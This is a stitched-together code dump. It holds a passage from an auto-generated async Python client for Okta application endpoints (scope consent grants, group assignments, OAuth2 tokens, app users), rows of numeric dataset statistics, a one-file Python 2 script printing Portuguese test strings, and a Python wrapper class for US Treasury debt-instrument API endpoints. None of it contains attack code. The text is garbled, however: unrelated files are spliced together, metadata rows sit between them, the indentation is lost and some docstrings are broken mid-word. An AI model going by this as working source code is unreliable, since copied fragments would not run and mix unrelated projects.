encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, JsonWebKey)
if error:
return (None, response, error)
try:
result = JsonWebKey(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def list_scope_consent_grants(
self, appId, query_params={}
):
"""
Lists all scope consent grants for the application
Args:
app_id {str}
query_params {dict}: Map of query parameters for request
[query_params.expand] {str}
Returns:
list: Collection of OAuth2ScopeConsentGrant instances.
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/grants
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OAuth2ScopeConsentGrant)
if error:
return (None, response, error)
try:
result = []
for item in response.get_body():
result.append(OAuth2ScopeConsentGrant(
self.form_response_body(item)
))
except Exception as error:
return (None, response, error)
return (result, response, None)
async def grant_consent_to_scope(
self, appId, o_auth_2_scope_consent_grant
):
"""
Grants consent for the application to request an OAuth
2.0 Okta scope
Args:
app_id {str}
{o_auth_2_scope_consent_grant}
Returns:
OAuth2ScopeConsentGrant
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/grants
""")
if isinstance(o_auth_2_scope_consent_grant, dict):
body = o_auth_2_scope_consent_grant
else:
body = o_auth_2_scope_consent_grant.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OAuth2ScopeConsentGrant)
if error:
return (None, response, error)
try:
result = OAuth2ScopeConsentGrant(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def revoke_scope_consent_grant(
self, appId, grantId
):
"""
Revokes permission for the application to request the g
iven scope
Args:
app_id {str}
grant_id {str}
"""
http_method = "delete".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/grants/{grantId}
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, error)
response, error = await self._request_executor\
.execute(request)
if error:
return (response, error)
return (response, None)
async def get_scope_consent_grant(
self, appId, grantId, query_params={}
):
"""
Fetches a single scope consent grant for the applicatio
n
Args:
app_id {str}
grant_id {str}
query_params {dict}: Map of query parameters for request
[query_params.expand] {str}
Returns:
OAuth2ScopeConsentGrant
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/grants/{grantId}
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OAuth2ScopeConsentGrant)
if error:
return (None, response, error)
try:
result = OAuth2ScopeConsentGrant(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def list_application_group_assignments(
self, appId, query_params={}
):
"""
Enumerates group assignments for an application.
Args:
app_id {str}
query_params {dict}: Map of query parameters for request
[query_params.q] {str}
[query_params.after] {str}
[query_params.limit] {str}
[query_params.expand] {str}
Returns:
list: Collection of ApplicationGroupAssignment instances.
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/groups
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, ApplicationGroupAssignment)
if error:
return (None, response, error)
try:
result = []
for item in response.get_body():
result.append(ApplicationGroupAssignment(
self.form_response_body(item)
))
except Exception as error:
return (None, response, error)
return (result, response, None)
async def delete_application_group_assignment(
self, appId, groupId
):
"""
Removes a group assignment from an application.
Args:
app_id {str}
group_id {str}
"""
http_method = "delete".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/groups/{groupId}
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, error)
response, error = await self._request_executor\
.execute(request)
if error:
return (response, error)
return (response, None)
async def get_application_group_assignment(
self, appId, groupId, query_params={}
):
"""
Fetches an application group assignment
Args:
app_id {str}
group_id {str}
query_params {dict}: Map of query parameters for request
[query_params.expand] {str}
Returns:
ApplicationGroupAssignment
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/groups/{groupId}
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, ApplicationGroupAssignment)
if error:
return (None, response, error)
try:
result = ApplicationGroupAssignment(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def create_application_group_assignment(
self, appId, groupId, application_group_assignment
):
"""
Assigns a group to an application
Args:
app_id {str}
group_id {str}
{application_group_assignment}
Returns:
ApplicationGroupAssignment
"""
http_method = "put".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/groups/{groupId}
""")
if isinstance(application_group_assignment, dict):
body = application_group_assignment
else:
body = application_group_assignment.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, ApplicationGroupAssignment)
if error:
return (None, response, error)
try:
result = ApplicationGroupAssignment(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def activate_application(
self, appId
):
"""
Activates an inactive application.
Args:
app_id {str}
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/lifecycle/activate
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, error)
response, error = await self._request_executor\
.execute(request)
if error:
return (response, error)
return (response, None)
async def deactivate_application(
self, appId
):
"""
Deactivates an active application.
Args:
app_id {str}
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/lifecycle/deactivate
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, error)
response, error = await self._request_executor\
.execute(request)
if error:
return (response, error)
return (response, None)
async def revoke_o_auth_2_tokens_for_application(
self, appId
):
"""
Revokes all tokens for the specified application
Args:
app_id {str}
"""
http_method = "delete".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/tokens
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, error)
response, error = await self._request_executor\
.execute(request)
if error:
return (response, error)
return (response, None)
async def list_o_auth_2_tokens_for_application(
self, appId, query_params={}
):
"""
Lists all tokens for the application
Args:
app_id {str}
query_params {dict}: Map of query parameters for request
[query_params.expand] {str}
[query_params.after] {str}
[query_params.limit] {str}
Returns:
list: Collection of OAuth2Token instances.
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/tokens
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OAuth2Token)
if error:
return (None, response, error)
try:
result = []
for item in response.get_body():
result.append(OAuth2Token(
self.form_response_body(item)
))
except Exception as error:
return (None, response, error)
return (result, response, None)
async def revoke_o_auth_2_token_for_application(
self, appId, tokenId
):
"""
Revokes the specified token for the specified applicati
on
Args:
app_id {str}
token_id {str}
"""
http_method = "delete".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/tokens/{tokenId}
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, error)
response, error = await self._request_executor\
.execute(request)
if error:
return (response, error)
return (response, None)
async def get_o_auth_2_token_for_application(
self, appId, tokenId, query_params={}
):
"""
Gets a token for the specified application
Args:
app_id {str}
token_id {str}
query_params {dict}: Map of query parameters for request
[query_params.expand] {str}
Returns:
OAuth2Token
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/tokens/{tokenId}
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OAuth2Token)
if error:
return (None, response, error)
try:
result = OAuth2Token(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def list_application_users(
self, appId, query_params={}
):
"""
Enumerates all assigned [application users](#applicatio
n-user-model) for an application.
Args:
app_id {str}
query_params {dict}: Map of query parameters for request
[query_params.q] {str}
[query_params.query_scope] {str}
[query_params.after] {str}
[query_params.limit] {str}
[query_params.filter] {str}
[query_params.expand] {str}
Returns:
list: Collection of AppUser instances.
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/users
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, AppUser)
if error:
return (None, response, error)
try:
result = []
for item in response.get_body():
result.append(AppUser(
self.form_response_body(item)
))
except Exception as error:
return (None, response, error)
return (result, response, None)
async def assign_user_to_application(
self, appId, app_user
):
"""
Assigns an user to an application with [credentials](#a
pplication-user-credentials-object) and an app-specific
[profile](#application-user-profile-object). Profile m
appings defined for the application are first applied b
efore applying any profile properties specified in the
request.
Args:
app_id {str}
{app_user}
Returns:
AppUser
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/users
""")
if isinstance(app_user, dict):
body = app_user
else:
body = app_user.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, AppUser)
if error:
return (None, response, error)
try:
result = AppUser(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def delete_application_user(
self, appId, userId, query_params={}
):
"""
Removes an assignment for a user from an application.
Args:
app_id {str}
user_id {str}
query_params {dict}: Map of query parameters for request
[query_params.sendEmail] {str}
"""
http_method = "delete".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/users/{userId}
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, error)
response, error = await self._request_executor\
.execute(request)
if error:
return (response, error)
return (response, None)
async def get_application_user(
self, appId, userId, query_params={}
):
"""
Fetches a specific user assignment for application by `
id`.
Args:
app_id {str}
user_id {str}
query_params {dict}: Map of query parameters for request
[query_params.expand] {str}
Returns:
AppUser
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/users/{userId}
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, AppUser)
if error:
return (None, response, error)
try:
result = AppUser(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def update_application_user(
self, appId, userId, app_user
):
"""
Updates a user's profile for an application
Args:
app_id {str}
user_id {str}
{app_user}
Returns:
AppUser
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/users/{userId}
""")
if isinstance(app_user, dict):
body = app_user
else:
body = app_user.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, AppUser)
if error:
return (None, response, error)
try:
result = AppUser(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
| 27.758151
| 72
| 0.533313
| 4,639
| 46,828
| 5.182151
| 0.060358
| 0.063602
| 0.058028
| 0.064642
| 0.864517
| 0.84272
| 0.824958
| 0.814601
| 0.805657
| 0.793095
| 0
| 0.003209
| 0.374413
| 46,828
| 1,686
| 73
| 27.774614
| 0.817409
| 0.014414
| 0
| 0.836638
| 0
| 0
| 0.126642
| 0.044801
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000944
| false
| 0.00661
| 0.011331
| 0
| 0.144476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a4d95ce98e7d496a224480c1bb172cc8703960d
| 163
|
py
|
Python
|
app.py
|
paulo-pieretti/aulagit
|
15c75d991aadd99ffadf6311dafa40844751feca
|
[
"MIT"
] | null | null | null |
app.py
|
paulo-pieretti/aulagit
|
15c75d991aadd99ffadf6311dafa40844751feca
|
[
"MIT"
] | null | null | null |
app.py
|
paulo-pieretti/aulagit
|
15c75d991aadd99ffadf6311dafa40844751feca
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
print "codigo 2"
print "adicionando uma diferenca"
print "adicionando mais uma diferenca"
print "adicionando uma diferenca no site do github"
| 20.375
| 51
| 0.779141
| 23
| 163
| 5.521739
| 0.608696
| 0.377953
| 0.299213
| 0.440945
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014286
| 0.141104
| 163
| 7
| 52
| 23.285714
| 0.892857
| 0.104294
| 0
| 0
| 0
| 0
| 0.731034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
dbe9cd3f5677fbf1b33918fc8a3f3f61bad2e68c
| 25,770
|
py
|
Python
|
treasury/outstanding_debt.py
|
areed1192/us-federal-treasury-python-api
|
59969bfd865528072ffcedfd861aab2e0f9764ba
|
[
"MIT"
] | 4
|
2021-05-27T01:43:00.000Z
|
2021-11-02T12:16:50.000Z
|
treasury/outstanding_debt.py
|
areed1192/us-federal-treasury-python-api
|
59969bfd865528072ffcedfd861aab2e0f9764ba
|
[
"MIT"
] | null | null | null |
treasury/outstanding_debt.py
|
areed1192/us-federal-treasury-python-api
|
59969bfd865528072ffcedfd861aab2e0f9764ba
|
[
"MIT"
] | 1
|
2022-01-16T14:59:32.000Z
|
2022-01-16T14:59:32.000Z
|
from typing import Dict
from typing import List
from treasury.session import FederalTreasurySession
class OutstandingDebtInstruments():
"""
## Overview:
----
The Federal Treasury provided a wide range of data on
outstanding debt instruments. The `OutstandingDebtInstruments`
object is used to query data on these instruments.
"""
def __init__(self, session: FederalTreasurySession) -> None:
"""Initializes the `OutstandingDebtInstruments` object.
### Parameters
----
session : `TreasurySession`
An initialized session of the `TreasurySession`.
### Usage
----
>>> treasury_client = FederalTreasuryClient()
>>> outstanding_debt_instruments_service = treasury_client.outstanding_debt_instruments()
"""
# Set the session.
self.treasury_session: FederalTreasurySession = session
def __repr__(self) -> str:
"""String representation of the `FederalTreasuryClient.OutstandingDebtInstruments` object."""
# define the string representation
str_representation = '<FederalTreasuryClient.OutstandingDebtInstruments (active=True, connected=True)>'
return str_representation
def rates_of_exchange(
self,
fields: List[str] = None,
sort: List[str] = None,
filters: List[str] = None,
page_number: int = 1,
page_size: int = 100
) -> Dict:
"""Queries Exchange rate of foreign currencies to the U.S.
dollar for reporting.
### Overview
----
Exchange rate of foreign currencies to the U.S.
for reporting.
### Parameters
----
fields : List[str] (optional, Default=None)
The fields parameter allows you to select which field(s) should be
included in the response. If desired fields are not specified, all
fields will be returned.
sort : List[str] (optional, Default=None)
The sort parameter allows a user to sort a field in ascending (least
to greatest) or descending (greatest to least) order. When no sort parameter
is specified, the default is to sort by the first column listed. Most API
endpoints are thus sorted by date in ascending order (historical to most
current).
filters : List[str] (optional, Default=None)
Filters are used to view a subset of the data based on specific
criteria. For example, you may want to find data that falls within
a certain date range, or only show records which contain a value
larger than a certain threshold. When no filters are provided,
the default response will return all fields and all data.
page_number : int (optional, Default=1)
The page number will set the index for the pagination, starting
at 1. This allows the user to paginate through the records
returned from an API request
page_size : int (optional, Default=100)
The page size will set the number of rows that are returned
on a request.
### Returns
----
Dict
A collection of `Records` resources.
### Usage
----
>>> treasury_client = FederalTreasuryClient()
>>> outstanding_debt_instruments_service = treasury_client.outstanding_debt_instruments()
>>> outstanding_debt_instruments_service.rates_of_exchange()
"""
if fields:
fields = ','.join(fields)
if filters:
filters = ','.join(filters)
if sort:
sort = ','.join(sort)
content = self.treasury_session.make_request(
method='get',
endpoint='/v1/accounting/od/rates_of_exchange',
params={
'format': 'json',
'page[number]': page_number,
'page[size]': page_size,
'fields': fields,
'sort': sort,
'filters': filters
}
)
return content
def mature_unredeemed_debt(
self,
fields: List[str] = None,
sort: List[str] = None,
filters: List[str] = None,
page_number: int = 1,
page_size: int = 100
) -> Dict:
"""Queries Mature Unredeemed Debt table.
### Overview
----
Savings bonds that have met their maturity date and have
not been requested by the customer to be redeemed.
### Parameters
----
fields : List[str] (optional, Default=None)
The fields parameter allows you to select which field(s) should be
included in the response. If desired fields are not specified, all
fields will be returned.
sort : List[str] (optional, Default=None)
The sort parameter allows a user to sort a field in ascending (least
to greatest) or descending (greatest to least) order. When no sort parameter
is specified, the default is to sort by the first column listed. Most API
endpoints are thus sorted by date in ascending order (historical to most
current).
filters : List[str] (optional, Default=None)
Filters are used to view a subset of the data based on specific
criteria. For example, you may want to find data that falls within
a certain date range, or only show records which contain a value
larger than a certain threshold. When no filters are provided,
the default response will return all fields and all data.
page_number : int (optional, Default=1)
The page number will set the index for the pagination, starting
at 1. This allows the user to paginate through the records
returned from an API request
page_size : int (optional, Default=100)
The page size will set the number of rows that are returned
on a request.
### Returns
----
Dict
A collection of `Records` resources.
### Usage
----
>>> treasury_client = FederalTreasuryClient()
>>> outstanding_debt_instruments_service = treasury_client.outstanding_debt_instruments()
>>> outstanding_debt_instruments_service.mature_unredeemed_debt()
"""
if fields:
fields = ','.join(fields)
if filters:
filters = ','.join(filters)
if sort:
sort = ','.join(sort)
content = self.treasury_session.make_request(
method='get',
endpoint='/v1/accounting/od/savings_bonds_mud',
params={
'format': 'json',
'page[number]': page_number,
'page[size]': page_size,
'fields': fields,
'sort': sort,
'filters': filters
}
)
return content
def piece_information_by_series(
self,
fields: List[str] = None,
sort: List[str] = None,
filters: List[str] = None,
page_number: int = 1,
page_size: int = 100
) -> Dict:
"""Queries Piece Information by Series table.
### Overview
----
Total number of savings bonds by series issued, redeemed
and outstanding as of the record_date.
### Parameters
----
fields : List[str] (optional, Default=None)
The fields parameter allows you to select which field(s) should be
included in the response. If desired fields are not specified, all
fields will be returned.
sort : List[str] (optional, Default=None)
The sort parameter allows a user to sort a field in ascending (least
to greatest) or descending (greatest to least) order. When no sort parameter
is specified, the default is to sort by the first column listed. Most API
endpoints are thus sorted by date in ascending order (historical to most
current).
filters : List[str] (optional, Default=None)
Filters are used to view a subset of the data based on specific
criteria. For example, you may want to find data that falls within
a certain date range, or only show records which contain a value
larger than a certain threshold. When no filters are provided,
the default response will return all fields and all data.
page_number : int (optional, Default=1)
The page number will set the index for the pagination, starting
at 1. This allows the user to paginate through the records
returned from an API request
page_size : int (optional, Default=100)
The page size will set the number of rows that are returned
on a request.
### Returns
----
Dict
A collection of `Records` resources.
### Usage
----
>>> treasury_client = FederalTreasuryClient()
>>> outstanding_debt_instruments_service = treasury_client.outstanding_debt_instruments()
>>> outstanding_debt_instruments_service.piece_information_by_series()
"""
if fields:
fields = ','.join(fields)
if filters:
filters = ','.join(filters)
if sort:
sort = ','.join(sort)
content = self.treasury_session.make_request(
method='get',
endpoint='/v1/accounting/od/savings_bonds_pcs',
params={
'format': 'json',
'page[number]': page_number,
'page[size]': page_size,
'fields': fields,
'sort': sort,
'filters': filters
}
)
return content
def saving_bonds_report(
self,
fields: List[str] = None,
sort: List[str] = None,
filters: List[str] = None,
page_number: int = 1,
page_size: int = 100
) -> Dict:
"""Queries Paper Savings Bonds Issues, Redemptions, and
Maturities by Series
### Overview
----
For each series of Treasury savings bonds, this dataset
details how many are issued and redeemed, the difference of
these two values is how many are outstanding, which is also
reported in the dataset. It does not contain any information
on the values or yields of the Treasury savings bonds. Data
in this report dates to the beginning of fiscal year 1999
and is updated monthly.
### Parameters
----
fields : List[str] (optional, Default=None)
The fields parameter allows you to select which field(s) should be
included in the response. If desired fields are not specified, all
fields will be returned.
sort : List[str] (optional, Default=None)
The sort parameter allows a user to sort a field in ascending (least
to greatest) or descending (greatest to least) order. When no sort parameter
is specified, the default is to sort by the first column listed. Most API
endpoints are thus sorted by date in ascending order (historical to most
current).
filters : List[str] (optional, Default=None)
Filters are used to view a subset of the data based on specific
criteria. For example, you may want to find data that falls within
a certain date range, or only show records which contain a value
larger than a certain threshold. When no filters are provided,
the default response will return all fields and all data.
page_number : int (optional, Default=1)
The page number will set the index for the pagination, starting
at 1. This allows the user to paginate through the records
returned from an API request
page_size : int (optional, Default=100)
The page size will set the number of rows that are returned
on a request.
### Returns
----
Dict
A collection of `Records` resources.
### Usage
----
>>> treasury_client = FederalTreasuryClient()
>>> outstanding_debt_instruments_service = treasury_client.outstanding_debt_instruments()
>>> outstanding_debt_instruments_service.saving_bonds_report()
"""
if fields:
fields = ','.join(fields)
if filters:
filters = ','.join(filters)
if sort:
sort = ','.join(sort)
content = self.treasury_session.make_request(
method='get',
endpoint='/v1/accounting/od/savings_bonds_report',
params={
'format': 'json',
'page[number]': page_number,
'page[size]': page_size,
'fields': fields,
'sort': sort,
'filters': filters
}
)
return content
def federal_debt_by_month(
self,
fields: List[str] = None,
sort: List[str] = None,
filters: List[str] = None,
page_number: int = 1,
page_size: int = 100
) -> Dict:
"""Schedules of Federal Debt by Month.
### Overview
----
This table represents monthly activity for the Federal Debt
Managed by the Bureau of the Fiscal Service separated by Held
by the Public and Intragovernmental Debt Holdings totaled by
Principal, Accrued Interest Payable, and Net Unamortized
Premiums/Discounts. All figures are rounded to the nearest
million.
### Parameters
----
fields : List[str] (optional, Default=None)
The fields parameter allows you to select which field(s) should be
included in the response. If desired fields are not specified, all
fields will be returned.
sort : List[str] (optional, Default=None)
The sort parameter allows a user to sort a field in ascending (least
to greatest) or descending (greatest to least) order. When no sort parameter
is specified, the default is to sort by the first column listed. Most API
endpoints are thus sorted by date in ascending order (historical to most
current).
filters : List[str] (optional, Default=None)
Filters are used to view a subset of the data based on specific
criteria. For example, you may want to find data that falls within
a certain date range, or only show records which contain a value
larger than a certain threshold. When no filters are provided,
the default response will return all fields and all data.
page_number : int (optional, Default=1)
The page number will set the index for the pagination, starting
at 1. This allows the user to paginate through the records
returned from an API request
page_size : int (optional, Default=100)
The page size will set the number of rows that are returned
on a request.
### Returns
----
Dict
A collection of `Records` resources.
### Usage
----
>>> treasury_client = FederalTreasuryClient()
>>> outstanding_debt_instruments_service = treasury_client.outstanding_debt_instruments()
>>> outstanding_debt_instruments_service.federal_debt_by_month()
"""
if fields:
fields = ','.join(fields)
if filters:
filters = ','.join(filters)
if sort:
sort = ','.join(sort)
content = self.treasury_session.make_request(
method='get',
endpoint='/v1/accounting/od/schedules_fed_debt',
params={
'format': 'json',
'page[number]': page_number,
'page[size]': page_size,
'fields': fields,
'sort': sort,
'filters': filters
}
)
return content
def federal_debt_fiscal_ytd(
self,
fields: List[str] = None,
sort: List[str] = None,
filters: List[str] = None,
page_number: int = 1,
page_size: int = 100
) -> Dict:
"""Schedules of Federal Debt, Fiscal Year-to-Date.
### Overview
----
This table represents fiscal year-to-date activity for the Federal
Debt Managed by the Bureau of the Fiscal Service separated by Held
by the Public and Intragovernmental Debt Holdings totaled by Principal,
Accrued Interest Payable, and Net Unamortized Premiums/Discounts. All
figures are rounded to the nearest million.
### Parameters
----
fields : List[str] (optional, Default=None)
The fields parameter allows you to select which field(s) should be
included in the response. If desired fields are not specified, all
fields will be returned.
sort : List[str] (optional, Default=None)
The sort parameter allows a user to sort a field in ascending (least
to greatest) or descending (greatest to least) order. When no sort parameter
is specified, the default is to sort by the first column listed. Most API
endpoints are thus sorted by date in ascending order (historical to most
current).
filters : List[str] (optional, Default=None)
Filters are used to view a subset of the data based on specific
criteria. For example, you may want to find data that falls within
a certain date range, or only show records which contain a value
larger than a certain threshold. When no filters are provided,
the default response will return all fields and all data.
page_number : int (optional, Default=1)
The page number will set the index for the pagination, starting
at 1. This allows the user to paginate through the records
returned from an API request
page_size : int (optional, Default=100)
The page size will set the number of rows that are returned
on a request.
### Returns
----
Dict
A collection of `Records` resources.
### Usage
----
>>> treasury_client = FederalTreasuryClient()
>>> outstanding_debt_instruments_service = treasury_client.outstanding_debt_instruments()
>>> outstanding_debt_instruments_service.federal_debt_fiscal_ytd()
"""
if fields:
fields = ','.join(fields)
if filters:
filters = ','.join(filters)
if sort:
sort = ','.join(sort)
content = self.treasury_session.make_request(
method='get',
endpoint='/v1/accounting/od/schedules_fed_debt_fytd',
params={
'format': 'json',
'page[number]': page_number,
'page[size]': page_size,
'fields': fields,
'sort': sort,
'filters': filters
}
)
return content
def saving_bond_securities(
self,
fields: List[str] = None,
sort: List[str] = None,
filters: List[str] = None,
page_number: int = 1,
page_size: int = 100
) -> Dict:
"""Savings Bonds Securities.
### Overview
----
Statistics on sold, redeemed, outstanding, and interest rates
of non-marketable savings bonds.
### Parameters
----
fields : List[str] (optional, Default=None)
The fields parameter allows you to select which field(s) should be
included in the response. If desired fields are not specified, all
fields will be returned.
sort : List[str] (optional, Default=None)
The sort parameter allows a user to sort a field in ascending (least
to greatest) or descending (greatest to least) order. When no sort parameter
is specified, the default is to sort by the first column listed. Most API
endpoints are thus sorted by date in ascending order (historical to most
current).
filters : List[str] (optional, Default=None)
Filters are used to view a subset of the data based on specific
criteria. For example, you may want to find data that falls within
a certain date range, or only show records which contain a value
larger than a certain threshold. When no filters are provided,
the default response will return all fields and all data.
page_number : int (optional, Default=1)
The page number will set the index for the pagination, starting
at 1. This allows the user to paginate through the records
returned from an API request
page_size : int (optional, Default=100)
The page size will set the number of rows that are returned
on a request.
### Returns
----
Dict
A collection of `Records` resources.
### Usage
----
>>> treasury_client = FederalTreasuryClient()
>>> outstanding_debt_instruments_service = treasury_client.outstanding_debt_instruments()
>>> outstanding_debt_instruments_service.saving_bond_securities()
"""
if fields:
fields = ','.join(fields)
if filters:
filters = ','.join(filters)
if sort:
sort = ','.join(sort)
content = self.treasury_session.make_request(
method='get',
endpoint='/v1/accounting/od/slgs_savings_bonds',
params={
'format': 'json',
'page[number]': page_number,
'page[size]': page_size,
'fields': fields,
'sort': sort,
'filters': filters
}
)
return content
def state_and_local_gov_securities(
self,
fields: List[str] = None,
sort: List[str] = None,
filters: List[str] = None,
page_number: int = 1,
page_size: int = 100
) -> Dict:
"""State and Local Government Series Securities (Non-Marketable).
### Overview
----
Recap of State and Local Government Series (SLGS) transaction
and balance activity updated daily including subscriptions,
cancellations, issues, outstanding, and redemptions of
non-marketable SLGS securities.
### Parameters
----
fields : List[str] (optional, Default=None)
The fields parameter allows you to select which field(s) should be
included in the response. If desired fields are not specified, all
fields will be returned.
sort : List[str] (optional, Default=None)
The sort parameter allows a user to sort a field in ascending (least
to greatest) or descending (greatest to least) order. When no sort parameter
is specified, the default is to sort by the first column listed. Most API
endpoints are thus sorted by date in ascending order (historical to most
current).
filters : List[str] (optional, Default=None)
Filters are used to view a subset of the data based on specific
criteria. For example, you may want to find data that falls within
a certain date range, or only show records which contain a value
larger than a certain threshold. When no filters are provided,
the default response will return all fields and all data.
page_number : int (optional, Default=1)
The page number will set the index for the pagination, starting
at 1. This allows the user to paginate through the records
returned from an API request
page_size : int (optional, Default=100)
The page size will set the number of rows that are returned
on a request.
### Returns
----
Dict
A collection of `Records` resources.
### Usage
----
>>> treasury_client = FederalTreasuryClient()
>>> outstanding_debt_instruments_service = treasury_client.outstanding_debt_instruments()
>>> outstanding_debt_instruments_service.state_and_local_gov_securities()
"""
if fields:
fields = ','.join(fields)
if filters:
filters = ','.join(filters)
if sort:
sort = ','.join(sort)
content = self.treasury_session.make_request(
method='get',
endpoint='/v1/accounting/od/slgs_securities',
params={
'format': 'json',
'page[number]': page_number,
'page[size]': page_size,
'fields': fields,
'sort': sort,
'filters': filters
}
)
return content
| 36.605114
| 111
| 0.58312
| 2,917
| 25,770
| 5.075763
| 0.087076
| 0.022694
| 0.047413
| 0.035661
| 0.865865
| 0.859787
| 0.859787
| 0.859787
| 0.859787
| 0.854654
| 0
